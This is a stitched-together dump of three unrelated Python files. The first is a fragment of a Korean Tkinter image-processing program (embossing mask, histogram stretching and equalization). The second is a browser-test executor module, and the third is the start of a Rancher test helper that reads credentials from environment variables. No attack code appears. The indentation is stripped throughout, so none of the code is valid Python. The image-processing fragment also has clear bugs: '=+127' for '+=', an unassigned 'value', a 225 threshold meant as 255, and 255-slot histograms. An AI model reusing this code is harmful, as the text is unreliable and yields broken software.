#1점을 처리하되, 3*3반복해서처리 : 마스크 연산 : 모두 곱해서 더하기\
S = 0.0
for m in range(0, MSIZE):
for n in range(0,MSIZE):
S +=mask[m][n]*tmpInImage [i+(m-1)][k + (n-1)]
tmpOutImage[i-1][k-1] = S
#127더해주기 (마스크의 합계가 0인 경우)
for i in range(outW) :
for k in range(outH) :
tmpOutImage[i][k] =+127
#임시 출력 --> 원래 출력
for i in range(outW) :
for k in range(outH) :
if value > 225 :
value = 255
elif value <0 :
value = 0
else:
outImage[i][k] = value
display()
def histogramStretch() : # 동일 영상 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
maxVal , minVal , HIGH= 0,255,255 #HIGH는 고정
for i in range(inH) :
for k in range(inW) :
data = inImage[i][k]
if data > maxVal:
maxVal = data
if data < minVal :
minVal = data
#히스토그램 스트래칭
#new = (old - min) * HIGH / (max-min) : 정규화 공식과 비슷하다
# out = (in - min) * HIGH / (max-min)
for i in range(inH):
for k in range(inW):
value = int( (inImage[i][k] - minVal) * HIGH / (maxVal-minVal))
if value<0:
value = 0
if value>255:
value =255
outImage[i][k] =value
display()
def histogramEqual():
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW
outH = inH
outImage = []
tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
histo = [0]*255
sumHisto = [0]*255
normalHisto = [0]*255
HIGH = 255 # HIGH는 고정
#히스토그램 작성
for i in range(inH):
for k in range(inW):
value = inImage[i][k]
histo[value] += 1
#누적 히스토그램 작성
sVal = 0
for i in range(len(histo)):
sVal += histo[i]
sumHisto[i] = sVal
#정규화된 누적 히스토그램 : (누적합/ ( 행개수*열개수)) * HIGH
for i in range(len(sumHisto)) :
normalHisto[i] = int(sumHisto[i] / (outW * outH) * HIGH)
#정규화된 값으로 출력하기
for i in range(inH):
for k in range(inW):
index = inImage[i][k]
outImage[i][k] = normalHisto[index]
display()
## 전역 변수부
window, canvas, paper, filename = [None] * 4
inImage, outImage = [], []; inW, inH, outW, outH = [0] * 4
panYN = False; sx, sy, ex, ey = [0] * 4
VIEW_X, VIEW_Y = 128, 128
status = None
## 메인 코드부
window = Tk(); window.geometry('400x400')
window.title('영상 처리&데이터 분석 Ver 0.7')
window.bind("<Button-1>", mouseClick)
window.bind("<ButtonRelease-1>", mouseDrop)
status = Label(window, text='이미지 정보:', bd=1, relief=SUNKEN, anchor=W)
status.pack(side=BOTTOM, fill=X)
mainMenu = Menu(window);window.config(menu=mainMenu)
fileMenu = Menu(mainMenu);mainMenu.add_cascade(label='파일', menu=fileMenu)
fileMenu.add_command(label='열기', command=openFile)
fileMenu.add_command(label='저장', command=saveFile)
fileMenu.add_separator()
fileMenu.add_command(label='종료', command=exitFile)
pixelMenu = Menu(mainMenu);mainMenu.add_cascade(label='화소점처리', menu=pixelMenu)
pixelMenu.add_command(label='동일영상', command=equal)
pixelMenu.add_command(label='밝게하기', command=addImage)
areaMenu = Menu(mainMenu);mainMenu.add_cascade(label='영역처리', menu=areaMenu)
areaMenu.add_command(label='엠보싱', command=embossing)
geoMenu = Menu(mainMenu);mainMenu.add_cascade(label='기하학 처리', menu=geoMenu)
geoMenu.add_command(label='상하반전', command=upDown)
geoMenu.add_command(label='화면이동', command=panImage)
geoMenu.add_command(label='화면축소', command=zoomOut)
analyzeMenu = Menu(mainMenu);mainMenu.add_cascade(label='데이터분석', menu=analyzeMenu)
analyzeMenu.add_command(label='평균값', command=a_average)
analyzeMenu.add_command(label='히스토그램', command=a_histogram)
analyzeMenu.add_command(label='히스토그램(matplotlib)', command=a_histogram2)
analyzeMenu.add_command(label='히스토그램 스트래칭', command=histogramStretch)
analyzeMenu.add_command(label='앤드-인 탐색', command=endInSearch)
analyzeMenu.add_command(label='히스토그램 평활화', command=histogramEqual)
otherMenu = Menu(mainMenu);mainMenu.add_cascade(label='다른 포맷 처리', menu=otherMenu)
otherMenu.add_command(label='CSV로 내보내기', command=saveCSV)
otherMenu.add_command(label='CSV(셔플)로 내보내기', command=saveShuffleCSV)
otherMenu.add_command(label='CSV 불러오기', command=openCSV)
otherMenu.add_separator()
otherMenu.add_command(label='SQLite로 내보내기', command=saveSQLite)
otherMenu.add_command(label='SQLite에서 가져오기', command=openSQLite)
otherMenu.add_separator()
otherMenu.add_command(label='MySQL로 내보내기', command=saveMySQL)
otherMenu.add_command(label='MySQL에서 가져오기', command=openMySQL)
otherMenu.add_separator()
otherMenu.add_command(label='Excel로 내보내기(숫자)', command=saveExcel1)
otherMenu.add_command(label='Excel로 내보내기(음영)', command=saveExcel2)
window.mainloop()
|
base.py
|
import base64
import hashlib
import io
import json
import os
import threading
import traceback
import socket
import sys
from abc import ABCMeta, abstractmethod
from six import text_type
from six.moves.http_client import HTTPConnection
from six.moves.urllib.parse import urljoin, urlsplit, urlunsplit
from ..testrunner import Stop
from .protocol import Protocol, BaseProtocolPart
here = os.path.split(__file__)[0]
def executor_kwargs(test_type, server_config, cache_manager, run_info_data,
**kwargs):
timeout_multiplier = kwargs["timeout_multiplier"]
if timeout_multiplier is None:
timeout_multiplier = 1
executor_kwargs = {"server_config": server_config,
"timeout_multiplier": timeout_multiplier,
"debug_info": kwargs["debug_info"]}
if test_type == "reftest":
executor_kwargs["screenshot_cache"] = cache_manager.dict()
if test_type == "wdspec":
executor_kwargs["binary"] = kwargs.get("binary")
executor_kwargs["webdriver_binary"] = kwargs.get("webdriver_binary")
executor_kwargs["webdriver_args"] = kwargs.get("webdriver_args")
return executor_kwargs
def strip_server(url):
"""Remove the scheme and netloc from a url, leaving only the path and any query
or fragment.
url - the url to strip
e.g. http://example.org:8000/tests?id=1#2 becomes /tests?id=1#2"""
url_parts = list(urlsplit(url))
url_parts[0] = ""
url_parts[1] = ""
return urlunsplit(url_parts)
class TestharnessResultConverter(object):
harness_codes = {0: "OK",
1: "ERROR",
2: "TIMEOUT",
3: "PRECONDITION_FAILED"}
test_codes = {0: "PASS",
1: "FAIL",
2: "TIMEOUT",
3: "NOTRUN",
4: "PRECONDITION_FAILED"}
def __call__(self, test, result, extra=None):
"""Convert a JSON result into a (TestResult, [SubtestResult]) tuple"""
result_url, status, message, stack, subtest_results = result
assert result_url == test.url, ("Got results from %s, expected %s" %
(result_url, test.url))
harness_result = test.result_cls(self.harness_codes[status], message, extra=extra, stack=stack)
return (harness_result,
[test.subtest_result_cls(st_name, self.test_codes[st_status], st_message, st_stack)
for st_name, st_status, st_message, st_stack in subtest_results])
testharness_result_converter = TestharnessResultConverter()
def hash_screenshot(data):
"""Computes the sha1 checksum of a base64-encoded screenshot."""
return hashlib.sha1(base64.b64decode(data)).hexdigest()
def _ensure_hash_in_reftest_screenshots(extra):
"""Make sure reftest_screenshots have hashes.
Marionette internal reftest runner does not produce hashes.
"""
log_data = extra.get("reftest_screenshots")
if not log_data:
return
for item in log_data:
if type(item) != dict:
# Skip relation strings.
continue
if "hash" not in item:
item["hash"] = hash_screenshot(item["screenshot"])
def reftest_result_converter(self, test, result):
extra = result.get("extra", {})
_ensure_hash_in_reftest_screenshots(extra)
return (test.result_cls(
result["status"],
result["message"],
extra=extra,
stack=result.get("stack")), [])
def pytest_result_converter(self, test, data):
harness_data, subtest_data = data
if subtest_data is None:
subtest_data = []
harness_result = test.result_cls(*harness_data)
subtest_results = [test.subtest_result_cls(*item) for item in subtest_data]
return (harness_result, subtest_results)
def crashtest_result_converter(self, test, result):
return test.result_cls(**result), []
class ExecutorException(Exception):
def __init__(self, status, message):
self.status = status
self.message = message
class TimedRunner(object):
def __init__(self, logger, func, protocol, url, timeout, extra_timeout):
self.func = func
self.logger = logger
self.result = None
self.protocol = protocol
self.url = url
self.timeout = timeout
self.extra_timeout = extra_timeout
self.result_flag = threading.Event()
def run(self):
if self.set_timeout() is Stop:
return Stop
if self.before_run() is Stop:
return Stop
executor = threading.Thread(target=self.run_func)
executor.start()
# Add twice the extra timeout since the called function is expected to
# wait at least self.timeout + self.extra_timeout and this gives some leeway
timeout = self.timeout + 2 * self.extra_timeout if self.timeout else None
finished = self.result_flag.wait(timeout)
if self.result is None:
if finished:
# flag is True unless we timeout; this *shouldn't* happen, but
# it can if self.run_func fails to set self.result due to raising
self.result = False, ("INTERNAL-ERROR", "%s.run_func didn't set a result" %
self.__class__.__name__)
else:
if self.protocol.is_alive():
message = "Executor hit external timeout (this may indicate a hang)\n"
# get a traceback for the current stack of the executor thread
message += "".join(traceback.format_stack(sys._current_frames()[executor.ident]))
self.result = False, ("EXTERNAL-TIMEOUT", message)
else:
self.logger.info("Browser not responding, setting status to CRASH")
self.result = False, ("CRASH", None)
elif self.result[1] is None:
# We didn't get any data back from the test, so check if the
# browser is still responsive
if self.protocol.is_alive():
self.result = False, ("INTERNAL-ERROR", None)
else:
self.logger.info("Browser not responding, setting status to CRASH")
self.result = False, ("CRASH", None)
return self.result
def set_timeout(self):
raise NotImplementedError
def before_run(self):
pass
def run_func(self):
raise NotImplementedError
class TestExecutor(object):
"""Abstract Base class for object that actually executes the tests in a
specific browser. Typically there will be a different TestExecutor
subclass for each test type and method of executing tests.
:param browser: ExecutorBrowser instance providing properties of the
browser that will be tested.
:param server_config: Dictionary of wptserve server configuration of the
form stored in TestEnvironment.config
:param timeout_multiplier: Multiplier relative to base timeout to use
when setting test timeout.
"""
__metaclass__ = ABCMeta
test_type = None
convert_result = None
supports_testdriver = False
supports_jsshell = False
# Extra timeout to use after internal test timeout at which the harness
# should force a timeout
extra_timeout = 5 # seconds
def __init__(self, browser, server_config, timeout_multiplier=1,
debug_info=None, **kwargs):
self.runner = None
self.browser = browser
self.server_config = server_config
self.timeout_multiplier = timeout_multiplier
self.debug_info = debug_info
self.last_environment = {"protocol": "http",
"prefs": {}}
self.protocol = None # This must be set in subclasses
@property
def logger(self):
"""StructuredLogger for this executor"""
if self.runner is not None:
return self.runner.logger
def setup(self, runner):
"""Run steps needed before tests can be started e.g. connecting to
browser instance
:param runner: TestRunner instance that is going to run the tests"""
self.runner = runner
if self.protocol is not None:
self.protocol.setup(runner)
def teardown(self):
"""Run cleanup steps after tests have finished"""
if self.protocol is not None:
self.protocol.teardown()
def reset(self):
"""Re-initialize internal state to facilitate repeated test execution
as implemented by the `--rerun` command-line argument."""
pass
def run_test(self, test):
"""Run a particular test.
:param test: The test to run"""
if test.environment != self.last_environment:
self.on_environment_change(test.environment)
try:
result = self.do_test(test)
except Exception as e:
self.logger.warning(traceback.format_exc(e))
result = self.result_from_exception(test, e)
if result is Stop:
return result
# log result of parent test
if result[0].status == "ERROR":
self.logger.debug(result[0].message)
self.last_environment = test.environment
self.runner.send_message("test_ended", test, result)
def server_url(self, protocol):
scheme = "https" if protocol == "h2" else protocol
return "%s://%s:%s" % (scheme,
self.server_config["browser_host"],
self.server_config["ports"][protocol][0])
def test_url(self, test):
return urljoin(self.server_url(test.environment["protocol"]), test.url)
@abstractmethod
def do_test(self, test):
"""Test-type and protocol specific implementation of running a
specific test.
:param test: The test to run."""
pass
def on_environment_change(self, new_environment):
pass
def result_from_exception(self, test, e):
if hasattr(e, "status") and e.status in test.result_cls.statuses:
status = e.status
else:
status = "INTERNAL-ERROR"
message = text_type(getattr(e, "message", ""))
if message:
message += "\n"
message += traceback.format_exc(e)
return test.result_cls(status, message), []
def wait(self):
self.protocol.base.wait()
class TestharnessExecutor(TestExecutor):
convert_result = testharness_result_converter
class RefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
def __init__(self, browser, server_config, timeout_multiplier=1, screenshot_cache=None,
debug_info=None, **kwargs):
TestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.screenshot_cache = screenshot_cache
class CrashtestExecutor(TestExecutor):
convert_result = crashtest_result_converter
class RefTestImplementation(object):
def __init__(self, executor):
self.timeout_multiplier = executor.timeout_multiplier
self.executor = executor
# Cache of url:(screenshot hash, screenshot). Typically the
# screenshot is None, but we set this value if a test fails
# and the screenshot was taken from the cache so that we may
# retrieve the screenshot from the cache directly in the future
self.screenshot_cache = self.executor.screenshot_cache
self.message = None
def setup(self):
pass
def teardown(self):
pass
@property
def logger(self):
return self.executor.logger
def get_hash(self, test, viewport_size, dpi):
key = (test.url, viewport_size, dpi)
if key not in self.screenshot_cache:
success, data = self.executor.screenshot(test, viewport_size, dpi)
if not success:
return False, data
screenshot = data
hash_value = hash_screenshot(data)
self.screenshot_cache[key] = (hash_value, screenshot)
rv = (hash_value, screenshot)
else:
rv = self.screenshot_cache[key]
self.message.append("%s %s" % (test.url, rv[0]))
return True, rv
def reset(self):
self.screenshot_cache.clear()
def is_pass(self, hashes, screenshots, urls, relation, fuzzy):
assert relation in ("==", "!=")
if not fuzzy or fuzzy == ((0,0), (0,0)):
equal = hashes[0] == hashes[1]
# sometimes images can have different hashes, but pixels can be identical.
if not equal:
self.logger.info("Image hashes didn't match, checking pixel differences")
max_per_channel, pixels_different = self.get_differences(screenshots, urls)
equal = pixels_different == 0 and max_per_channel == 0
else:
max_per_channel, pixels_different = self.get_differences(screenshots, urls)
allowed_per_channel, allowed_different = fuzzy
self.logger.info("Allowed %s pixels different, maximum difference per channel %s" %
("-".join(str(item) for item in allowed_different),
"-".join(str(item) for item in allowed_per_channel)))
equal = ((pixels_different == 0 and allowed_different[0] == 0) or
(max_per_channel == 0 and allowed_per_channel[0] == 0) or
(allowed_per_channel[0] <= max_per_channel <= allowed_per_channel[1] and
allowed_different[0] <= pixels_different <= allowed_different[1]))
return equal if relation == "==" else not equal
def get_differences(self, screenshots, urls):
from PIL import Image, ImageChops, ImageStat
lhs = Image.open(io.BytesIO(base64.b64decode(screenshots[0]))).convert("RGB")
rhs = Image.open(io.BytesIO(base64.b64decode(screenshots[1]))).convert("RGB")
self.check_if_solid_color(lhs, urls[0])
self.check_if_solid_color(rhs, urls[1])
diff = ImageChops.difference(lhs, rhs)
minimal_diff = diff.crop(diff.getbbox())
mask = minimal_diff.convert("L", dither=None)
stat = ImageStat.Stat(minimal_diff, mask)
per_channel = max(item[1] for item in stat.extrema)
count = stat.count[0]
self.logger.info("Found %s pixels different, maximum difference per channel %s" %
(count, per_channel))
return per_channel, count
def check_if_solid_color(self, image, url):
extrema = image.getextrema()
if all(min == max for min, max in extrema):
color = ''.join('%02X' % value for value, _ in extrema)
self.message.append("Screenshot is solid color 0x%s for %s\n" % (color, url))
def run_test(self, test):
viewport_size = test.viewport_size
dpi = test.dpi
self.message = []
# Depth-first search of reference tree, with the goal
# of reachings a leaf node with only pass results
stack = list(((test, item[0]), item[1]) for item in reversed(test.references))
while stack:
hashes = [None, None]
screenshots = [None, None]
urls = [None, None]
nodes, relation = stack.pop()
fuzzy = self.get_fuzzy(test, nodes, relation)
for i, node in enumerate(nodes):
success, data = self.get_hash(node, viewport_size, dpi)
if success is False:
return {"status": data[0], "message": data[1]}
hashes[i], screenshots[i] = data
urls[i] = node.url
if self.is_pass(hashes, screenshots, urls, relation, fuzzy):
fuzzy = self.get_fuzzy(test, nodes, relation)
if nodes[1].references:
stack.extend(list(((nodes[1], item[0]), item[1]) for item in reversed(nodes[1].references)))
else:
# We passed
return {"status":"PASS", "message": None}
# We failed, so construct a failure message
for i, (node, screenshot) in enumerate(zip(nodes, screenshots)):
if screenshot is None:
success, screenshot = self.retake_screenshot(node, viewport_size, dpi)
if success:
screenshots[i] = screenshot
log_data = [
{"url": nodes[0].url, "screenshot": screenshots[0], "hash": hashes[0]},
relation,
{"url": nodes[1].url, "screenshot": screenshots[1], "hash": hashes[1]},
]
return {"status": "FAIL",
"message": "\n".join(self.message),
"extra": {"reftest_screenshots": log_data}}
def get_fuzzy(self, root_test, test_nodes, relation):
full_key = tuple([item.url for item in test_nodes] + [relation])
ref_only_key = test_nodes[1].url
fuzzy_override = root_test.fuzzy_override
fuzzy = test_nodes[0].fuzzy
sources = [fuzzy_override, fuzzy]
keys = [full_key, ref_only_key, None]
value = None
for source in sources:
for key in keys:
if key in source:
value = source[key]
break
if value:
break
return value
def retake_screenshot(self, node, viewport_size, dpi):
success, data = self.executor.screenshot(node, viewport_size, dpi)
if not success:
return False, data
key = (node.url, viewport_size, dpi)
hash_val, _ = self.screenshot_cache[key]
self.screenshot_cache[key] = hash_val, data
return True, data
class WdspecExecutor(TestExecutor):
convert_result = pytest_result_converter
protocol_cls = None
def __init__(self, browser, server_config, webdriver_binary,
webdriver_args, timeout_multiplier=1, capabilities=None,
debug_info=None, **kwargs):
self.do_delayed_imports()
TestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.webdriver_binary = webdriver_binary
self.webdriver_args = webdriver_args
self.timeout_multiplier = timeout_multiplier
self.capabilities = capabilities
self.protocol = self.protocol_cls(self, browser)
def is_alive(self):
return self.protocol.is_alive()
def on_environment_change(self, new_environment):
pass
def do_test(self, test):
timeout = test.timeout * self.timeout_multiplier + self.extra_timeout
success, data = WdspecRun(self.do_wdspec,
self.protocol.session_config,
test.abs_path,
timeout).run()
if success:
return self.convert_result(test, data)
return (test.result_cls(*data), [])
def do_wdspec(self, session_config, path, timeout):
return pytestrunner.run(path,
self.server_config,
session_config,
timeout=timeout)
def do_delayed_imports(self):
global pytestrunner
from . import pytestrunner
class WdspecRun(object):
def __init__(self, func, session, path, timeout):
self.func = func
self.result = (None, None)
self.session = session
self.path = path
self.timeout = timeout
self.result_flag = threading.Event()
def run(self):
"""Runs function in a thread and interrupts it if it exceeds the
given timeout. Returns (True, (Result, [SubtestResult ...])) in
case of success, or (False, (status, extra information)) in the
event of failure.
"""
executor = threading.Thread(target=self._run)
executor.start()
self.result_flag.wait(self.timeout)
if self.result[1] is None:
self.result = False, ("EXTERNAL-TIMEOUT", None)
return self.result
def _run(self):
try:
self.result = True, self.func(self.session, self.path, self.timeout)
except (socket.timeout, IOError):
self.result = False, ("CRASH", None)
except Exception as e:
message = getattr(e, "message")
if message:
message += "\n"
message += traceback.format_exc(e)
self.result = False, ("INTERNAL-ERROR", message)
finally:
self.result_flag.set()
class ConnectionlessBaseProtocolPart(BaseProtocolPart):
def load(self, url):
pass
def execute_script(self, script, asynchronous=False):
pass
def set_timeout(self, timeout):
pass
def wait(self):
pass
def set_window(self, handle):
pass
class ConnectionlessProtocol(Protocol):
implements = [ConnectionlessBaseProtocolPart]
def connect(self):
pass
def after_connect(self):
pass
class WebDriverProtocol(Protocol):
server_cls = None
implements = [ConnectionlessBaseProtocolPart]
def __init__(self, executor, browser):
Protocol.__init__(self, executor, browser)
self.webdriver_binary = executor.webdriver_binary
self.webdriver_args = executor.webdriver_args
self.capabilities = self.executor.capabilities
self.session_config = None
self.server = None
def connect(self):
"""Connect to browser via the HTTP server."""
self.server = self.server_cls(
self.logger,
binary=self.webdriver_binary,
args=self.webdriver_args)
self.server.start(block=False)
self.logger.info(
"WebDriver HTTP server listening at %s" % self.server.url)
self.session_config = {"host": self.server.host,
"port": self.server.port,
"capabilities": self.capabilities}
def after_connect(self):
pass
def teardown(self):
if self.server is not None and self.server.is_alive():
self.server.stop()
def is_alive(self):
"""Test that the connection is still alive.
Because the remote communication happens over HTTP we need to
make an explicit request to the remote. It is allowed for
WebDriver spec tests to not have a WebDriver session, since this
may be what is tested.
An HTTP request to an invalid path that results in a 404 is
proof enough to us that the server is alive and kicking.
"""
conn = HTTPConnection(self.server.host, self.server.port)
conn.request("HEAD", self.server.base_path + "invalid")
res = conn.getresponse()
return res.status == 404
class CallbackHandler(object):
"""Handle callbacks from testdriver-using tests.
The default implementation here makes sense for things that are roughly like
WebDriver. Things that are more different to WebDriver may need to create a
fully custom implementation."""
unimplemented_exc = (NotImplementedError,)
def __init__(self, logger, protocol, test_window):
self.protocol = protocol
self.test_window = test_window
self.logger = logger
self.callbacks = {
"action": self.process_action,
"complete": self.process_complete
}
self.actions = {
"click": ClickAction(self.logger, self.protocol),
"send_keys": SendKeysAction(self.logger, self.protocol),
"action_sequence": ActionSequenceAction(self.logger, self.protocol),
"generate_test_report": GenerateTestReportAction(self.logger, self.protocol),
"set_permission": SetPermissionAction(self.logger, self.protocol),
"add_virtual_authenticator": AddVirtualAuthenticatorAction(self.logger, self.protocol),
"remove_virtual_authenticator": RemoveVirtualAuthenticatorAction(self.logger, self.protocol),
"add_credential": AddCredentialAction(self.logger, self.protocol),
"get_credentials": GetCredentialsAction(self.logger, self.protocol),
"remove_credential": RemoveCredentialAction(self.logger, self.protocol),
"remove_all_credentials": RemoveAllCredentialsAction(self.logger, self.protocol),
"set_user_verified": SetUserVerifiedAction(self.logger, self.protocol),
}
def __call__(self, result):
url, command, payload = result
self.logger.debug("Got async callback: %s" % result[1])
try:
callback = self.callbacks[command]
except KeyError:
raise ValueError("Unknown callback type %r" % result[1])
return callback(url, payload)
def process_complete(self, url, payload):
rv = [strip_server(url)] + payload
return True, rv
def process_action(self, url, payload):
action = payload["action"]
self.logger.debug("Got action: %s" % action)
try:
action_handler = self.actions[action]
except KeyError:
raise ValueError("Unknown action %s" % action)
try:
result = action_handler(payload)
except self.unimplemented_exc:
self.logger.warning("Action %s not implemented" % action)
self._send_message("complete", "error", "Action %s not implemented" % action)
except Exception:
self.logger.warning("Action %s failed" % action)
self.logger.warning(traceback.format_exc())
self._send_message("complete", "error")
raise
else:
self.logger.debug("Action %s completed with result %s" % (action, result))
return_message = {"result": result}
self._send_message("complete", "success", json.dumps(return_message))
return False, None
def _send_message(self, message_type, status, message=None):
self.protocol.testdriver.send_message(message_type, status, message=message)
class ClickAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
selector = payload["selector"]
element = self.protocol.select.element_by_selector(selector)
self.logger.debug("Clicking element: %s" % selector)
self.protocol.click.element(element)
class SendKeysAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
selector = payload["selector"]
keys = payload["keys"]
element = self.protocol.select.element_by_selector(selector)
self.logger.debug("Sending keys to element: %s" % selector)
self.protocol.send_keys.send_keys(element, keys)
class ActionSequenceAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
# TODO: some sort of shallow error checking
actions = payload["actions"]
for actionSequence in actions:
if actionSequence["type"] == "pointer":
for action in actionSequence["actions"]:
if (action["type"] == "pointerMove" and
isinstance(action["origin"], dict)):
action["origin"] = self.get_element(action["origin"]["selector"], action["frame"]["frame"])
self.protocol.action_sequence.send_actions({"actions": actions})
def get_element(self, element_selector, frame):
element = self.protocol.select.element_by_selector(element_selector, frame)
return element
class GenerateTestReportAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
message = payload["message"]
self.logger.debug("Generating test report: %s" % message)
self.protocol.generate_test_report.generate_test_report(message)
class SetPermissionAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
permission_params = payload["permission_params"]
descriptor = permission_params["descriptor"]
name = descriptor["name"]
state = permission_params["state"]
one_realm = permission_params.get("oneRealm", False)
self.logger.debug("Setting permission %s to %s, oneRealm=%s" % (name, state, one_realm))
self.protocol.set_permission.set_permission(descriptor, state, one_realm)
class AddVirtualAuthenticatorAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
self.logger.debug("Adding virtual authenticator")
config = payload["config"]
authenticator_id = self.protocol.virtual_authenticator.add_virtual_authenticator(config)
self.logger.debug("Authenticator created with ID %s" % authenticator_id)
return authenticator_id
class RemoveVirtualAuthenticatorAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
self.logger.debug("Removing virtual authenticator %s" % authenticator_id)
return self.protocol.virtual_authenticator.remove_virtual_authenticator(authenticator_id)
class AddCredentialAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
credential = payload["credential"]
self.logger.debug("Adding credential to virtual authenticator %s " % authenticator_id)
return self.protocol.virtual_authenticator.add_credential(authenticator_id, credential)
class GetCredentialsAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
self.logger.debug("Getting credentials from virtual authenticator %s " % authenticator_id)
return self.protocol.virtual_authenticator.get_credentials(authenticator_id)
class RemoveCredentialAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
credential_id = payload["credential_id"]
self.logger.debug("Removing credential %s from authenticator %s" % (credential_id, authenticator_id))
return self.protocol.virtual_authenticator.remove_credential(authenticator_id, credential_id)
class RemoveAllCredentialsAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
self.logger.debug("Removing all credentials from authenticator %s" % authenticator_id)
return self.protocol.virtual_authenticator.remove_all_credentials(authenticator_id)
class SetUserVerifiedAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
authenticator_id = payload["authenticator_id"]
uv = payload["uv"]
self.logger.debug(
"Setting user verified flag on authenticator %s to %s" % (authenticator_id, uv["isUserVerified"]))
return self.protocol.virtual_authenticator.set_user_verified(authenticator_id, uv)
|
common.py
|
import inspect
import json
import os
import random
import subprocess
import ssl
import time
import requests
import ast
import paramiko
import rancher
import pytest
from urllib.parse import urlparse
from rancher import ApiError
from lib.aws import AmazonWebServices
from copy import deepcopy
from threading import Lock
from threading import Thread
import websocket
import base64
DEFAULT_TIMEOUT = 120
DEFAULT_CATALOG_TIMEOUT = 15
DEFAULT_MONITORING_TIMEOUT = 180
DEFAULT_CLUSTER_STATE_TIMEOUT = 320
DEFAULT_MULTI_CLUSTER_APP_TIMEOUT = 300
DEFAULT_APP_DELETION_TIMEOUT = 360
DEFAULT_APP_V2_TIMEOUT = 60
CATTLE_TEST_URL = os.environ.get('CATTLE_TEST_URL', "")
CATTLE_API_URL = CATTLE_TEST_URL + "/v3"
CATTLE_AUTH_URL = \
CATTLE_TEST_URL + "/v3-public/localproviders/local?action=login"
ADMIN_TOKEN = os.environ.get('ADMIN_TOKEN', "None")
USER_TOKEN = os.environ.get('USER_TOKEN', "None")
USER_PASSWORD = os.environ.get('USER_PASSWORD', "None")
ADMIN_PASSWORD = os.environ.get('ADMIN_PASSWORD', "None")
kube_fname = os.path.join(os.path.dirname(os.path.realpath(__file__)),
"k8s_kube_config")
MACHINE_TIMEOUT = float(os.environ.get('RANCHER_MACHINE_TIMEOUT', "1200"))
HARDENED_CLUSTER = ast.literal_eval(
os.environ.get('RANCHER_HARDENED_CLUSTER', "False"))
TEST_OS = os.environ.get('RANCHER_TEST_OS', "linux")
TEST_IMAGE = os.environ.get('RANCHER_TEST_IMAGE', "sangeetha/mytestcontainer")
TEST_IMAGE_PORT = os.environ.get('RANCHER_TEST_IMAGE_PORT', "80")
TEST_IMAGE_NGINX = os.environ.get('RANCHER_TEST_IMAGE_NGINX', "nginx")
TEST_IMAGE_OS_BASE = os.environ.get('RANCHER_TEST_IMAGE_OS_BASE', "ubuntu")
if TEST_OS == "windows":
DEFAULT_TIMEOUT = 300
skip_test_windows_os = pytest.mark.skipif(
TEST_OS == "windows",
reason='Tests Skipped for including Windows nodes cluster')
skip_test_hardened = pytest.mark.skipif(
HARDENED_CLUSTER,
reason='Tests Skipped due to being a hardened cluster')
UPDATE_KDM = ast.literal_eval(os.environ.get('RANCHER_UPDATE_KDM', "False"))
KDM_URL = os.environ.get("RANCHER_KDM_URL", "")
CLUSTER_NAME = os.environ.get("RANCHER_CLUSTER_NAME", "")
RANCHER_CLEANUP_CLUSTER = \
ast.literal_eval(os.environ.get('RANCHER_CLEANUP_CLUSTER', "True"))
env_file = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"rancher_env.config")
AWS_SSH_KEY_NAME = os.environ.get("AWS_SSH_KEY_NAME")
AWS_ACCESS_KEY_ID = os.environ.get("AWS_ACCESS_KEY_ID")
AWS_SECRET_ACCESS_KEY = os.environ.get("AWS_SECRET_ACCESS_KEY")
AWS_REGION = os.environ.get("AWS_REGION")
AWS_SUBNET = os.environ.get("AWS_SUBNET")
AWS_VPC = os.environ.get("AWS_VPC")
AWS_SG = os.environ.get("AWS_SG")
AWS_ZONE = os.environ.get("AWS_ZONE")
AWS_IAM_PROFILE = os.environ.get("AWS_IAM_PROFILE", "")
AWS_S3_BUCKET_NAME = os.environ.get("AWS_S3_BUCKET_NAME", "")
AWS_S3_BUCKET_FOLDER_NAME = os.environ.get("AWS_S3_BUCKET_FOLDER_NAME", "")
LINODE_ACCESSKEY = os.environ.get('RANCHER_LINODE_ACCESSKEY', "None")
NFS_SERVER_MOUNT_PATH = "/nfs"
TEST_RBAC = ast.literal_eval(os.environ.get('RANCHER_TEST_RBAC', "False"))
if_test_rbac = pytest.mark.skipif(TEST_RBAC is False,
reason='rbac tests are skipped')
TEST_ALL_SNAPSHOT = ast.literal_eval(
os.environ.get('RANCHER_TEST_ALL_SNAPSHOT', "False")
)
if_test_all_snapshot = \
pytest.mark.skipif(TEST_ALL_SNAPSHOT is False,
reason='Snapshots check tests are skipped')
